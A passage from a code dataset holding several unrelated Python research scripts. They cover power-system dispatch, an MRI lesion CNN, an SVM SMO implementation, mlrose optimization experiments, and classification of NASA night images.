lvl_f_stage += [varobject[i].value for i in batteries]\n\n # Svael volt_t+1 for the next backward iteration\n sol_vol_iter[s] = [sum(x) for x in zip(sol_vol_iter[s], vol_f_stage)]\n sol_lvl_batt[s] = [sum(x) for x in zip(sol_lvl_batt[s], lvl_f_stage )]\n\n # Update the initial volume at each stage\n for i, plant in enumerate(hydroPlants):\n model.iniVol[plant] = vol_f_stage[i]\n for i, plant in enumerate(batteries): \n model.iniLvl[plant] = lvl_f_stage[i]\n for y in lenblk:\n model.iniLvlBlk[plant,y+1] = lvl_f_stage[i]/numBlocks\n\n # marginal cost of each area\n if (iteration + 1 == Param.max_iter or confidence == 1):\n duals_dmd = [[[] for x in lenblk] for y in range(numAreas)]\n d_object = getattr(model, 'ctDemand')\n for areadem in range(numAreas):\n for i in lenblk:\n duals_dmd[areadem][i].append(model.dual[d_object[areadem+1,i+1]])\n marg_costs[k][s] = duals_dmd\n\n # RESULTS\n if ((iteration + 1 == Param.max_iter or confidence == 1) and Param.results is True):\n\n (genThermal,genHydro,genBatteries,genDeficit,loadBatteries,lvlBatteries,\n lvlHydro,linTransfer,spillHydro,genwind,spillwind,genSmall,emsscurve,genRnws) = saveiter(k,\n s,lenblk,thermalPlants,model,genThermal,hydroPlants,batteries,genHydro,\n genBatteries,loadBatteries,lvlBatteries,lvlHydro,genDeficit,linTransfer,\n circuits,spillHydro,genwind,spillwind,genSmall,smallPlants,rnwArea,Param,\n emissCurve,genRnws)\n\n # progress of the analysis\n bar.update(count+1)\n count += 1\n\n # Operation costs by scenarios\n sol_cost_scn[0].append(sum(sol_cost[0]))\n sol_cost_scn[1].append(sol_cost[1][0])\n sol_cost_scn[2].append(sum(sol_cost[0][:(Param.stages-Param.bnd_stages)]))\n\n# for s in lenstg:\n# # save the last solutions\n# last_sol = [x/dataParam.sf for x in sol_vol_iter[s]]\n# last_batt = [x/dataParam.sf for x in sol_lvl_batt[s]]\n# if last_sol not in sol_vol[s+1] or last_batt not in sol_lvl[s+1]:\n# sol_vol[s+1].append([x/dataParam.sf for x in sol_vol_iter[s]])\n# sol_lvl[s+1].append([x/dataParam.sf for x in sol_lvl_batt[s]])\n\n # Export results\n if ((iteration + 1 == Param.max_iter or confidence == 1) and Param.results is True):\n\n # export data\n DataDictionary = { \"genThermal\":genThermal,\"genHydro\":genHydro,\"genSmall\":genSmall,\n \"genBatteries\":genBatteries,\"genDeficit\":genDeficit,\"loadBatteries\":loadBatteries,\n \"lvlBatteries\":lvlBatteries,\"lvlHydro\":lvlHydro,\"linTransfer\":linTransfer,\n \"spillHydro\":spillHydro,\"genwind\":genwind,\"spillwind\":spillwind,\"marg_costs\":marg_costs,\n \"emsscurve\":emsscurve,\"genRnws\":genRnws}\n\n pickle.dump(DataDictionary, open( \"savedata/results_save.p\", \"wb\" ) )\n\n return (sol_vol_iter, sol_lvl_batt, sol_cost_scn, sol_scn)\n\n","sub_path":"scripts/forward2.py","file_name":"forward2.py","file_ext":"py","file_size_in_byte":24066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"483132953","text":"from __future__ import print_function\n\nfrom keras.datasets import mnist\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\nimport numpy as np\nfrom keras.utils.np_utils import to_categorical\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD\n\nfrom keras.models import load_model\n\n\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D, Convolution3D, MaxPooling3D\nfrom keras.layers import Merge\nfrom keras.utils import np_utils\n\nfrom keras.models import model_from_json\nfrom keras import backend as K\n\n\nimport random as rdm\nimport nibabel as nib\nimport image_manager as imm\nimport gc\n\nimport tensorflow as tf\nimport json\n\n#############################################\n\nmodel_name\t= \"paralel_v1_2D\"\n\n#### default: takes 3 imag types -> less context so as the input size of \n ### the NN is equal, and the comparison is fair\n\n\nbatch_size = 128\nnb_classes = 2\nnb_epoch = 30\n# input image dimensions\ninp_dim_2d = 33\ninp_dim_3d = 65\nstep = 8\n\n# number of convolutional filters to use\nnb_filters = 45 ### lets change it manually, increasing it \n# size of pooling area for max pooling\npool_size_2d = (2, 2)\n# convolution kernel size\nkernel_size_2d = (3, 3)\n\n\n# exp1\nimg_types = [\"flair\",\"FA\",\"anatomica\"]\n\n\n\n# prepare input for the \ninput_shape_2d = (inp_dim_2d, inp_dim_2d, len(img_types))\ninput_shape_3d = (inp_dim_3d, inp_dim_3d, len(img_types))\n\n\n\n\n\n\n## paralel NN, y\nmodel_y = Sequential()\n\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1],\n border_mode='valid',\n input_shape=input_shape_2d))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_y.add(Dropout(0.25))\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_y.add(Dropout(0.25))\n\nmodel_y.add(Flatten())\n\n\n## paralel NN, z\nmodel_z = Sequential()\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1],\n border_mode='valid',\n input_shape=input_shape_3d))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_z.add(Dropout(0.25))\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_z.add(Dropout(0.25))\n\nmodel_z.add(Flatten())\n\n\n\nmerged = Merge([model_y, model_z], mode='concat')\nfinal_model = Sequential()\n\nfinal_model.add(merged)\n# print(\"Output shape after merge:\", final_model.output_shape)\n# final_model.add(Dense(1024))\n# final_model.add(Activation('relu'))\n# final_model.add(Dropout(0.5))\nprint(\"Output shape after fully connected(dropout0.5):\", final_model.output_shape)\nfinal_model.add(Dense(128))\nfinal_model.add(Activation('relu'))\nfinal_model.add(Dropout(0.5))\nprint(\"Output shape after dully connected(dropout0.5):\", final_model.output_shape)\nfinal_model.add(Dense(nb_classes))\nfinal_model.add(Activation('softmax'))\nprint(\"Output shape after softmax (2 classes):\", final_model.output_shape)\n\n#train_data partition\nbrains = [\"tka002\",\"tka003\",\"tka004\",\"tka005\",\"tka006\",\"tka007\",\"tka009\",\"tka010\",\"tka011\",\"tka012\",\"tka013\",\"tka015\",\"tka016\",\"tka017\",\"tka018\",\"tka019\",\"tka020\",\"tka021\"]\n\n#balance proportion\nbal_train = 10\nbal_test = 200\n\ntr = imm.ImageManager() # load training data\nres = []\ndef evaluate(model,X_test,y_test):\n\ty_pred = model.predict(X_test)\n\tmat = [[0,0],[0,0]] # [[TP,FP],[FN,TN]]\n\tfor i in range(len(y_pred)):\n\t\tif y_test[i][1] == 0: # real negative\n\t\t\tmat[1][1] += y_pred[i][0] #TN\n\t\t\tmat[0][1] += y_pred[i][1] #FP\n\t\telse:\n\t\t\tmat[1][0] += y_pred[i][0] #FN\n\t\t\tmat[0][0] += y_pred[i][1] #TP\n\n\t# mat[0][0] /= len(y_pred)\n\t# mat[0][1] /= len(y_pred)\n\t# mat[1][0] /= len(y_pred)\n\t# mat[1][1] /= len(y_pred)\n\n\tTPR = mat[0][0] / (mat[0][0] + mat[1][0])\n\tTNR = mat[1][1] / (mat[1][1] + mat[0][1])\n\treturn(mat,TPR,TNR)\t\n\nfor i in range(len(brains)/4):\n\tfor it in range(1):\n\t\ttrain_brain = brains[:i*4]+brains[(i+1)*4:]\n\t\ttest_brain = brains[i*4:(i+1)*4]\n\n\t\t## load training data\n\t\ttr.reset()\n\t\ttr.init(train_brain)\n\t\ttr.createSlices(step=step)\n\t\ttr.balance(bal_train)\n\t\ttr.split(1) # we will select the hole brain\n\n\t\tX_train_y = tr.getData(img_types, \"2dy\", inp_dim_2d)[0]\n\t\ty_train = X_train_y[1]\n\t\tX_train_y = X_train_y[0]\n\n\t\tX_train_z = tr.getData(img_types, \"2dy\", inp_dim_3d)[0][0]\n\n\n\n\n\t\tfinal_model.compile(loss='binary_crossentropy',\n\t\t optimizer='adadelta',\n\t\t metrics=['accuracy'])\n\n\t\tcv = final_model.fit([X_train_y, X_train_z], y_train, batch_size=batch_size, validation_split=0.1, nb_epoch=nb_epoch,verbose=2)\n\t\tfinal_model.save(\"../models/model_\" + model_name +\"_\"+ str(i) + \".mdl\")\n\n\t\twith open(\"hist_\"+model_name+\"_\"+str(i)+\".json\",\"w\") as tf:\n\t\t\ttf.write(json.dumps(cv.history))\n\n\t\t#model = load_model(\"../models/model_0.mdl\")\n\t\ttr.reset()\n\t\t### test stuff\n\n\t\ttt = imm.ImageManager() # load training data\n\t\ttt.init(test_brain)\n\t\ttt.createSlices(step=step+1)\n\t\ttt.balance(bal_test)\n\t\ttt.split(1) # we will select the hole brain\n\n\t\tX_test_y = tt.getData(img_types, \"2dy\", inp_dim_2d)[0]\n\t\ty_test = X_test_y[1]\n\t\tX_test_y = X_test_y[0]\n\n\t\tX_test_z = tt.getData(img_types, \"2dy\", inp_dim_3d)[0][0]\t\n\n\t\tscore = evaluate(final_model,[X_test_y, X_test_z],y_test)\n\t\tres.append((score,train_brain, test_brain))\n\t\tprint(\"###########################################\")\n\t\tprint(\"Cross Validation:\",i, \"\\tIteration:\",it)\n\t\tprint(\"balance:\", bal_test, \"(\", y_test.shape[0], \")\")\n\t\tprint(score[0][0])\n\t\tprint(score[0][1])\n\t\tprint(\"TPR:\", score[1])\n\t\tprint(\"TNR:\", score[2])\n\t\ttt.reset()\n\tprint(\"\")\n\tprint(\"########################################\")\n\tprint(\"### Total (Average) cv: \"+i+\" ###\")\n\tprint(\"########################################\")\n\tTP = 0\n\tTN = 0\n\tFP = 0\n\tFN = 0\n\tfor el in res[i*1:(i*1)+1]:\n\t\tTP += el[0][0][0][0]\n\t\tTN += el[0][0][1][1]\n\t\tFP += el[0][0][0][1]\n\t\tFN += el[0][0][1][0]\n\ttotal = TP+TN+FP+FN\n\tTP = TP / float(total)\n\tTN = TN / float(total)\n\tFP = FP / float(total)\n\tFN = FN / float(total)\n\tprint([TP,FP], [\"TP\",\"FP\"])\n\tprint([FN,TN], [\"FN\",\"TN\"])\n\tprint(\"\")\n\tprint(\"Accuracy:\", TP+TN)\n\tprint(\"TPR:\", TP / float(TP + FN))\n\tprint(\"TNR:\", TN / float(TN + FP))\n\n\nprint(\"\")\nprint(\"########################################\")\nprint(\"### Total (Average) ###\")\nprint(\"########################################\")\nTP = 0\nTN = 0\nFP = 0\nFN = 0\nfor el in res:\n\tTP += el[0][0][0][0]\n\tTN += el[0][0][1][1]\n\tFP += el[0][0][0][1]\n\tFN += el[0][0][1][0]\ntotal = TP+TN+FP+FN\nTP = TP / float(total)\nTN = TN / float(total)\nFP = FP / float(total)\nFN = FN / float(total)\nprint([TP,FP], [\"TP\",\"FP\"])\nprint([FN,TN], [\"FN\",\"TN\"])\nprint(\"\")\nprint(\"Accuracy:\", TP+TN)\nprint(\"TPR:\", TP / float(TP + FN))\nprint(\"TNR:\", TN / float(TN + FP))\n\n\n\n","sub_path":"src/dnn_1_2d.py","file_name":"dnn_1_2d.py","file_ext":"py","file_size_in_byte":7226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469552824","text":"from classifier import classifier\nfrom numpy import *\n\n\nclass SVM(classifier):\n def __init__(self, c=1.0, tolerance=0.0001, max_iter=10000):\n self.X = None # X observations (nxp matrix)\n self.Y = None # labels\n self.m = None # max number of rows/observations in X\n self.n = None\n self.w = None\n self.alphas = None # support vectors\n self.eCache = None # first column is valid flag TODO: ???\n self.b = 0\n self.C = c # budget for amount that the margin can be violated\n self.tol = tolerance # tolerance for stopping criteria?\n self.max_iter = max_iter\n\n def fit(self, x, y):\n self.X = mat(x)\n self.Y = mat(y).transpose()\n self.m = shape(x)[0]\n self.m, n = shape(self.X)\n self.w = zeros((n, 1))\n self.alphas = mat(zeros((self.m, 1)))\n self.eCache = mat(zeros((self.m, 2)))\n n_iter = 0\n entire = True\n alpha_pairs_changed = 0\n\n while (n_iter < self.max_iter) and ((alpha_pairs_changed > 0) or entire):\n alpha_pairs_changed = 0\n if entire: # go over all\n for i in range(self.m): # iterate over number of observations\n alpha_pairs_changed += self.inner_l_k(i)\n print(\"fullSet, iter: %d i:%d, pairs changed %d\" % (n_iter, i, alpha_pairs_changed))\n n_iter += 1\n else: # go over non-bound (railed) alphas\n non_bound_is = nonzero((self.alphas.A > 0) * (self.alphas.A < self.C))[0]\n for i in non_bound_is:\n alpha_pairs_changed += self.inner_l_k(i)\n print(\"non-bound, iter: %d i:%d, pairs changed %d\" % (n_iter, i, alpha_pairs_changed))\n n_iter += 1\n\n if entire:\n entire = False # toggle entire set loop\n elif alpha_pairs_changed == 0:\n entire = True\n print(\"iteration number: %d\" % n_iter)\n\n return self.calc_ws()\n\n def predict(self, X):\n fx = dot(self.w.T, X.T) + self.b\n hyp = apply_along_axis(lambda x: 1 if x >= 0 else -1, 0, fx)\n return hyp\n\n def calc_ws(self):\n for i in range(self.m):\n self.w += multiply(self.alphas[i] * self.Y[i], self.X[i, :].T)\n return self.w\n\n def calc_ek_k(self, k):\n \"\"\"\n Calculates weight for observation, k\n :param k:\n :return:\n \"\"\"\n # f = w^T * x\n # f = (a * y)T * (X*(X_k)T) + b\n f = float(multiply(self.alphas, self.Y).T * (self.X * self.X[k, :].T)) + self.b\n # w = f - y\n w = f - float(self.Y[k])\n return w\n\n def select_j_k(self, i, e_i): #this is the second choice -heurstic, and calcs Ej\n max_k = -1\n max_delta_e = 0\n e_j = 0\n self.eCache[i] = [1, e_i] #set valid #choose the alpha that gives the maximum delta E\n valid_ecache_list = nonzero(self.eCache[:, 0].A)[0]\n if (len(valid_ecache_list)) > 1:\n for k in valid_ecache_list: #loop through valid Ecache values and find the one that maximizes delta E\n if k == i:\n continue #don't calc for i, waste of time\n e_k = self.calc_ek_k(k)\n delta_e = abs(e_i - e_k)\n if delta_e > max_delta_e:\n max_k = k\n max_delta_e = delta_e\n e_j = e_k\n return max_k, e_j\n else: #in this case (first time around) we don't have any valid eCache values\n j = select_j_rand(i, self.m)\n e_j = self.calc_ek_k(j)\n return j, e_j\n\n def update_ek_k(self, k): # after any alpha has changed update the new value in the cache\n e_k = self.calc_ek_k(k)\n self.eCache[k] = [1, e_k]\n\n def inner_l_k(self, i):\n\n Ei = self.calc_ek_k(i)\n\n if ((self.Y[i]*Ei < -self.tol) and (self.alphas[i] < self.C)) or \\\n ((self.Y[i]*Ei > self.tol) and (self.alphas[i] > 0)):\n\n j, Ej = self.select_j_k(i, Ei) # this has been changed from selectJrand\n\n alpha_i_old = self.alphas[i].copy()\n alpha_j_old = self.alphas[j].copy()\n\n if self.Y[i] != self.Y[j]:\n l = max(0, self.alphas[j] - self.alphas[i])\n h = min(self.C, self.C + self.alphas[j] - self.alphas[i])\n else:\n l = max(0, self.alphas[j] + self.alphas[i] - self.C)\n h = min(self.C, self.alphas[j] + self.alphas[i])\n if l == h:\n print(\"L==H\")\n return 0\n\n # eta = 2 * X_i * X_j - X_i * (X_i)T - X_j * (X_j)T\n eta = (2.0 * self.X[i, :] * self.X[j, :].T) - (self.X[i, :] * self.X[i, :].T) - (self.X[j, :] * self.X[j, :].T)\n if eta >= 0:\n print(\"eta>=0\")\n return 0\n\n self.alphas[j] -= self.Y[j]*(Ei - Ej)/eta\n self.alphas[j] = clip_alpha(j, h, l)\n self.update_ek_k(j) # added this for the Ecache\n if abs(self.alphas[j] - alpha_j_old) < 0.00001:\n print(\"j not moving enough\"); return 0\n self.alphas[i] += self.Y[j]*self.Y[i]*(alpha_j_old - self.alphas[j])#update i by the same amount as j\n self.update_ek_k(i) # added this for the Ecache #the update is in the oppselftie direction\n b1 = self.b - Ei - self.Y[i]*(self.alphas[i]-alpha_i_old)*self.X[i, :]*self.X[i, :].T - self.Y[j]*(self.alphas[j]-alpha_j_old)*self.X[i,:]*self.X[j, :].T\n b2 = self.b - Ej - self.Y[i]*(self.alphas[i]-alpha_i_old)*self.X[i, :]*self.X[j, :].T - self.Y[j]*(self.alphas[j]-alpha_j_old)*self.X[j,:]*self.X[j, :].T\n if (0 < self.alphas[i]) and (self.C > self.alphas[i]):\n self.b = b1\n elif (0 < self.alphas[j]) and (self.C > self.alphas[j]):\n self.b = b2\n else:\n self.b = (b1 + b2)/2.0\n return 1\n else:\n return 0\n\n\ndef clip_alpha(aj, H, L):\n if aj > H:\n aj = H\n if L > aj:\n aj = L\n return aj\n\n\ndef select_j_rand(i, m):\n j=i #we want to select any J not equal to i\n while (j==i):\n j = int(random.uniform(0,m))\n return j\n\n\n\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290046159","text":"import argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport mlrose_hiive as mlrose\nimport numpy as np\nimport time\n\nSIZE = 60\n\nalgs = {\n 'hill_climbing': mlrose.random_hill_climb,\n 'simulated_annealing': mlrose.simulated_annealing,\n 'genetic_alg': mlrose.genetic_alg,\n 'mimic': mlrose.mimic\n}\n\n# Define alternative N-Queens fitness function for maximization problem\ndef queens_max(state):\n \n # Initialize counter\n fitness = 0\n \n # For all pairs of queens\n for i in range(len(state) - 1):\n for j in range(i + 1, len(state)):\n \n # Check for horizontal, diagonal-up and diagonal-down attacks\n if (state[j] != state[i]) \\\n and (state[j] != state[i] + (j - i)) \\\n and (state[j] != state[i] - (j - i)):\n \n # If no attacks, then increment counter\n fitness += 1\n\n return fitness\n\n# note: genetic alg should excel at four peaks,\n# while RHC and annealing are likely to get stuck in the local optima with bigger basins (all 1s or all 0s).\n# annealing and RHC will perform well on onemax because there is only one optimum and it's global (wide basin).\n# MIMIC will perform best on kcolor, per Charles Isbell's paper\n# call_counter_array = np.zeros(100)\n# call_counter_idx = 0\n\nfitness_evals = []\n\ndef get_score(alg, problem, params, num_seeds = 30):\n fitnesses = []\n fitness_curves = []\n for random_seed in range(1,num_seeds+1):\n params.update({'random_state': random_seed, 'curve': True})\n\n global fitness_evals\n fitness_evals = []\n\n state, fitness, curve = alg(**params)\n \n fitnesses.append(fitness)\n fitness_curves.append(curve)\n \n print(state)\n \n avg_fitness_curve = [ np.mean( [ c[i] for c in fitness_curves ] ) for i in range(min([len(c) for c in fitness_curves])) ]\n return np.mean(fitnesses), avg_fitness_curve\n\n# def get_hyperparam_score(alg, problem, params):\n# fitness, curve = get_score(alg, problem, params, 20)\n# return fitness\n\ndef get_hyperparam_score(alg, problem, params, num_seeds = 20):\n fitnesses = []\n for random_seed in range(1, num_seeds+1):\n params.update({'random_state': random_seed, 'curve': True})\n state, fitness, curve = alg(**params)\n fitnesses.append(fitness)\n\n return np.mean(fitnesses)\n\ndef get_fitness_eval_curve():\n fitness_eval_x = []\n fitness_eval_y = []\n maximum = 0\n for i in range(len(fitness_evals)):\n if fitness_evals[i] > maximum:\n maximum = fitness_evals[i]\n fitness_eval_x.append(i)\n fitness_eval_y.append(fitness_evals[i])\n return fitness_eval_x, fitness_eval_y\n\ndef get_final_score(learner, fitness, hyperparams):\n problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n params = hyperparams.copy()\n params.update({'problem': problem})\n\n start = time.process_time()\n score, curve = get_score(alg, problem, params)\n print( 'Time taken to learn:', time.process_time() - start )\n\n print( 'Average Best Score over 30 random seeds:', score )\n\n plt.plot( curve )\n plt.xlabel( 'Iterations' )\n plt.ylabel( 'Average Fitness Score' )\n plt.suptitle( learner )\n plt.show()\n\n x, y = get_fitness_eval_curve()\n plt.plot(x, y)\n plt.xlabel( 'Fitness Function Evaluations' )\n plt.ylabel( 'Fitness Score' )\n plt.suptitle( learner )\n plt.show()\n return score\n\ndef find_best_hyperparameter(alg, fitness, params, param_name, possible_values, show_graph = True):\n best_avg_score = 0\n best_val = None\n scores = []\n for v in possible_values:\n problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n problem.set_mimic_fast_mode( True )\n cur_params = params.copy()\n cur_params.update({param_name: v, 'problem': problem})\n score = get_hyperparam_score(alg, problem, cur_params)\n scores.append(score)\n if score > best_avg_score:\n best_avg_score = score\n best_val = v\n \n # plot it\n if show_graph:\n plt.plot(possible_values, scores)\n plt.xlabel( f'{param_name}' )\n plt.ylabel( 'Average Fitness Score' )\n plt.suptitle( f'{param_name}' )\n plt.show()\n\n return best_val \n\ndef optimize_hyperparams(title, alg, fitness, params, hyperparams):\n best_hyperparams = {}\n for param_name, (possible_values, show_graph) in hyperparams.items():\n print( 'optimizing hyperparameter %s' % param_name )\n best_hyperparams[param_name] = find_best_hyperparameter(alg, fitness, params, param_name, possible_values, show_graph)\n print( 'optimal value found: %s' % best_hyperparams[param_name] )\n \n print('parameters optimized.')\n \n # print('parameters optimized. plotting learning curve with optimal params.')\n\n # problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n # temp_params = hyperparams.copy()\n # temp_params.update({'problem': problem})\n # score, curve = get_score(alg, problem, temp_params)\n # print('Score:', score)\n # plt.plot( curve )\n # plt.xlabel( 'Iterations' )\n # plt.ylabel( 'Average fitness score' )\n # plt.suptitle( title )\n # plt.show()\n \n return best_hyperparams\n\ndef optimize_hill_climbing_hyperparams(fitness):\n # params = { 'max_attempts': 100,\n # 'max_iters': 100,\n # 'restarts': 20 }\n params = { 'max_attempts': 200, 'restarts': 2000 }\n # mlrose.random_hill_climb()\n hyperparams = {}\n return params\n # return optimize_hyperparams( 'Random Hill Climbing', mlrose.random_hill_climb, fitness, params )\n\ndef optimize_simulated_annealing_hyperparams(fitness):\n params = { 'max_attempts': 100,\n 'max_iters': 1000 }\n hyperparams = {}\n return params\n # return optimize_hyperparams( 'Simulated Annualing', mlrose.simulated_annealing, fitness, params )\n\ndef optimize_genetic_alg_hyperparams(fitness):\n params = { 'max_attempts': 100 }\n if fitness == mlrose.OneMax:\n hyperparams = { 'pop_breed_percent': 0.7 }\n params.update(hyperparams)\n return params\n hyperparams = { 'pop_size': ( [ 100 + 20*i for i in range(11) ], True ),\n 'pop_breed_percent': ( [ 0.7 + 0.01*i for i in range(11) ], True ),\n 'elite_dreg_ratio': ( [ 0.95 + 0.01*i for i in range(5) ], True ),\n 'mutation_prob': ( [ 0.2 * i for i in range(1, 5) ], True ) }\n \n optimized = optimize_hyperparams( 'Genetic Alg', mlrose.genetic_alg, fitness, params, hyperparams )\n params.update(optimized)\n return params\n\ndef optimize_mimic_hyperparams(fitness):\n # params = { 'fast_mimic': True }\n params = {}\n if isinstance(fitness, mlrose.OneMax):\n hyperparams = {}\n params.update(hyperparams)\n return params\n elif isinstance(fitness, mlrose.MaxKColor):\n hyperparams = {}\n params.update(hyperparams)\n return params\n elif isinstance(fitness, mlrose.FourPeaks):\n hyperparams = { 'pop_size': 1200, 'keep_pct': 0.3 }\n params.update(hyperparams)\n return params\n hyperparams = { 'pop_size': ( [ 100 + 20*i for i in range(11) ], True ),\n 'keep_pct': ( [ 0.1 + 0.02*i for i in range(11) ], True ) }\n \n optimized = optimize_hyperparams( 'MIMIC', mlrose.mimic, fitness, params, hyperparams )\n params.update(optimized)\n return params\n\ndef get_custom_fitness(fitness):\n def counting_fitness(state):\n global fitness_evals\n score = fitness.evaluate(state)\n fitness_evals.append( score )\n return score\n return counting_fitness\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument( '--learner', action = 'store', dest = 'learner', required = True )\n parser.add_argument( '--problem', action = 'store', dest = 'problem', required = True )\n # parser.add_argument( '--size', action = 'store', dest = 'size', required = False, default = 8)\n args = parser.parse_args()\n\n # size = int(args.size)\n\n if args.problem == 'queens':\n fitness = mlrose.CustomFitness(queens_max)\n elif args.problem == 'onemax':\n fitness = mlrose.OneMax()\n elif args.problem == 'four_peaks':\n fitness = mlrose.FourPeaks(t_pct = 0.15)\n elif args.problem == 'kcolor':\n edges = [(0, 1), (0, 2), (0, 4), (1, 3), (2, 0), (2, 3), (3, 4)]\n fitness = mlrose.MaxKColor(edges)\n problem = mlrose.DiscreteOpt(length = 5, fitness_fn = fitness)\n init_state = np.array([0, 1, 0, 1, 1])\n else:\n raise RuntimeError(\"Invalid problem argument\")\n\n if args.learner == 'hill_climbing':\n hyperparams = optimize_hill_climbing_hyperparams(fitness)\n elif args.learner == 'simulated_annealing':\n hyperparams = optimize_simulated_annealing_hyperparams(fitness)\n elif args.learner == 'genetic_alg':\n hyperparams = optimize_genetic_alg_hyperparams(fitness)\n elif args.learner == 'mimic':\n hyperparams = optimize_mimic_hyperparams(fitness)\n else:\n raise RuntimeError(\"Invalid learner argument\")\n\n # hyperparams = {'max_attempts': 100, 'mutation_prob': 0.4}\n\n print( 'found hyperparams:', hyperparams )\n\n custom_fitness_function = get_custom_fitness(fitness)\n custom_fitness = mlrose.CustomFitness(custom_fitness_function)\n\n alg = algs[args.learner]\n \n get_final_score(args.learner, custom_fitness, hyperparams)\n \n # print( 'call counter array:', call_counter_array )\n # avg_best_score, avg_fitness_curve = get_score()\n\n # best_fitnesses = []\n # fitness_curves = []\n\n # for random_seed in range(30):\n # if args.learner == 'simulated_annealing':\n # # Define decay schedule\n # schedule = mlrose.ExpDecay()\n # best_state, best_fitness, fitness_curve = mlrose.simulated_annealing(problem, schedule = schedule, max_attempts = 100, max_iters = 1000, curve = True, random_state = random_seed)\n # elif args.learner == 'hill_climbing':\n # best_state, best_fitness, fitness_curve = mlrose.random_hill_climb(problem, restarts = 100, max_attempts = 100, max_iters = 100, curve = True, random_state = random_seed)\n # elif args.learner == 'genetic_alg':\n # best_state, best_fitness, fitness_curve = mlrose.genetic_alg(problem, max_attempts = 100, curve = True)\n # elif args.learner == 'mimic':\n # best_state, best_fitness, fitness_curve = mlrose.mimic(problem, curve = True, random_state = random_seed)\n # else:\n # raise ValueError('Invalid learner argument')\n\n # best_fitnesses.append(best_fitness)\n # fitness_curves.append(fitness_curve)\n # print('The curve is: ', fitness_curve)\n # print(len( fitness_curve ))\n\n # avg_best_fitness = np.mean( best_fitnesses )\n # avg_fitness_curve = [ np.mean( [ c[i] for c in fitness_curves ] ) for i in range(100) ]\n # plt.plot( avg_fitness_curve )\n # plt.xlabel( 'Iterations' )\n # plt.ylabel( 'Average fitness score' )\n # plt.suptitle( args.learner )\n # plt.show()","sub_path":"ro.py","file_name":"ro.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"461490653","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras import models\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport gc\n\ndef get_images():\n \n with open(\"mfr_list.csv\", \"r\") as mfr_list:\n \n mfrs = mfr_list.readlines()\n mfrs = mfrs[:-1]\n \n missions = []\n \n for i in range(1,len(mfrs)):\n missions.append(mfrs[i].split('-E-'))\n mfrs[i] = mfrs[i].strip(\"\\n\")\n\n mfr_list.close()\n \n os.chdir(\"../dataset/mfr_processing/\")\n \n for i in range(1, 5001):\n os.system(\"wget https://eol.jsc.nasa.gov/DatabaseImages/ESC/small/\"+missions[i][0]+\"/\"+mfrs[i]+\".JPG\")\n \n os.chdir(\"../../scripts/\")\n \n return \n\nif os.path.exists(\"../dataset/mfr_processing/ISS038-E-65727.JPG\"):\n print(\"Images Available\")\nelse:\n get_images()\n\nimage_names = pd.read_csv(\"mfr_list.csv\")\nimage_names = image_names.apply(lambda x: x+\".JPG\")\n\nmodel = models.load_model(\"../models/darkskies_model_VGG16.h5\")\n#model.load_weights(\"../models/\")\n\ntest_datagen=ImageDataGenerator(rescale=1./255.)\n \ntest_generator=test_datagen.flow_from_dataframe(dataframe=image_names[:5001],\n directory=\"../dataset/mfr_processing/\",\n x_col=\"MFR\",\n batch_size=1,\n seed=42,\n shuffle=False,\n class_mode=None,\n target_size=(300,300))\n\npredictions=[]\n\nfor batch in range(len(test_generator)):\n pred=model.predict(test_generator[batch], verbose = 1)\n if np.argmax(pred) == 0:\n predictions.append(\"Aurora\")\n elif np.argmax(pred) == 1:\n predictions.append(\"Black\")\n elif np.argmax(pred) == 2:\n predictions.append(\"City\")\n elif np.argmax(pred) == 3:\n predictions.append(\"Astronomical\")\n else:\n continue\n\nfilenames=test_generator.filenames\nresults=pd.DataFrame({\"Filename\":filenames,\n \"Predictions\":predictions})\n\nresults[\"Filename\"] = results[\"Filename\"].apply(lambda x: x.rstrip(\".JPG\"))\nresults.to_csv(\"results.csv\", index=False)\n\ngc.collect()\n\nresults[\"Filename\"] = results[\"Filename\"].apply(lambda x: x+\".JPG\")\n\nos.chdir(\"../dataset/mfr_processing/\")\n\nfor result in range(len(results[\"Predictions\"])):\n \n if results[\"Predictions\"][result] == \"Aurora\":\n os.system(\"mv \"+results[\"Filename\"][result]+\" Aurora/\")\n elif results[\"Predictions\"][result] == \"Black\":\n os.system(\"mv \"+results[\"Filename\"][result]+\" Black/\")\n elif results[\"Predictions\"][result] == \"City\":\n os.system(\"mv 